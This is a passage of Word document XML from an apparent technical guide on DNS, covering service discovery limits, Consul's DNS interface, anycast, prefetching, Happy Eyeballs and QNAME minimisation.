      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="2E93060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D9E3A2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>TTL/Freshness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FE73F3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Caching can serve stale data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B310A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Real-time (watch/subscribe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="373A9EE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5A0956" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Client changes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251230" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>None (DNS is universal)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37B57F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Requires integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="351884E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EFE979" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Load balancing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DCBF11" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Round-robin (DNS rotation)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9ACF89" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Client-side with real algorithms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08AE5181" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hybrid approach (Consul DNS interface):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22798A52" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Consul exposes a DNS interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC3811" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBFBA91" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>my-service.service.consul → [healthy IPs only]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C653713" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Clients use standard DNS. Consul handles health checking, returns only healthy instances. Combines the universality of DNS with the health awareness of a service registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FEAB0B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 DNS Limitations for Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F4A85B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB58FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching defeats real-time updates:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> If a pod dies, DNS may still serve its IP for TTL seconds. Clients get errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1C903" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No connection draining:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS can't tell clients "stop using this IP gracefully." It either returns the IP or doesn't.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1149668A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-side caching is uncontrollable:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Even with TTL=0, some libraries cache. You can't force clients to re-resolve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF6591" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limited metadata:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS can carry IP, port (SRV), weight, priority. But not "this instance is at 80% capacity" or "this instance supports protocol v3."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461856AC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No push notifications:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS is pull-based (client queries). No way to immediately notify all clients of a change. Must wait for TTL expiry and re-query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1ED03" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why modern service meshes bypass DNS for traffic routing</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — the sidecar proxy maintains a real-time connection to the control plane and receives instant updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE4E7A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3D85EF46">
          <v:rect id="_x0000_i3486" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A05759D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. DNS Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7DD2F6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Anycast DNS — Global Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1319C9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D0F582" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Your authoritative nameservers use anycast — the same IP is announced from multiple global locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22674CA0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF36C24" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>ns1.example.com (IP: 198.51.100.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68888EFF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Announced from New York (BGP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2B875" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Announced from London (BGP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB48F4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Announced from Tokyo (BGP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA9A6C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>└── Announced from São Paulo (BGP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2FCA6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A client in Tokyo → query routes to the Tokyo instance (nearest via BGP). A client in London → query routes to London instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666336DB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C6580" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="777"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Queries reach the nearest instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E8F3B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="777"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DDoS resilience:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Attack traffic is distributed across all anycast instances globally. No single point absorbs the full attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509998F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="777"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatic failover:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> If one instance dies, BGP withdraws the announcement. Traffic shifts to the next nearest instance within seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8DD6A2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 DNS Prefetching and Pre-Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FC058" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser DNS prefetching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32D25A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When loading a page with links to other domains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC8D35" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0981DAD0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>&lt;link rel="dns-prefetch" href="//cdn.example.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B405A6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>&lt;link rel="dns-prefetch" href="//api.example.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764991F6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>The browser resolves these domains in the background BEFORE the user clicks any link. When they do click, DNS is already cached → instant connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F717057" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection preconnect (goes further):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFC20D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F43DB9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>&lt;link rel="preconnect" href="https://cdn.example.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0A340" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Not only resolves DNS but also completes TCP + TLS handshake. Zero latency when the resource is finally needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B374D8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Happy Eyeballs (RFC 8305) — Dual-Stack Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A96247E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A domain has both A (IPv4) and AAAA (IPv6) records. Client tries IPv6 first. If IPv6 is broken (misconfigured, black-holed), client waits for timeout (seconds) before falling back to IPv4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02ABB7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Happy Eyeballs algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A824DAC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolve BOTH A and AAAA records in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EA8949" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Start connecting via IPv6 (preferred).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1B280" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If IPv6 doesn't respond within 250ms → simultaneously start connecting via IPv4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149B170" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Use whichever connection completes first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132906D5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Cancel the slower one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7D77F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Users always get the fastest path. Broken IPv6 adds at most 250ms latency (not 10–30 seconds of timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A12ECDD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.4 DNS Query Minimization (RFC 7816)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315D04B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The privacy problem with full resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4D0AC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Traditional: resolver sends the FULL name to every server in the chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326210A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="779"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Root server sees: "resolver wants </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006F072B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F072B">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CE4C35" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="779"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>TLD server sees: "resolver wants </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006F072B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F072B">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E6358" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>They only need to know their part. Root only needs to know "which TLD?" (.com). TLD only needs "which SLD?" (example.com).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43461BDB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QNAME minimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7882E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Query to root: "Where is .com?" (not www.example.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2054ED" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Query to TLD: "Where is example.com?" (not www.example.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6710FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Query to authoritative: "What is www.example.com?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903B4B7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Each server sees only what's necessary for its delegation decision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38C585" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="563935A8">
          <v:rect id="_x0000_i3487" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE4EAB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. DNS Reliability and High Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711CB74E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Multiple Nameservers (Required)</w:t>
      </w:r>
    </w:p>
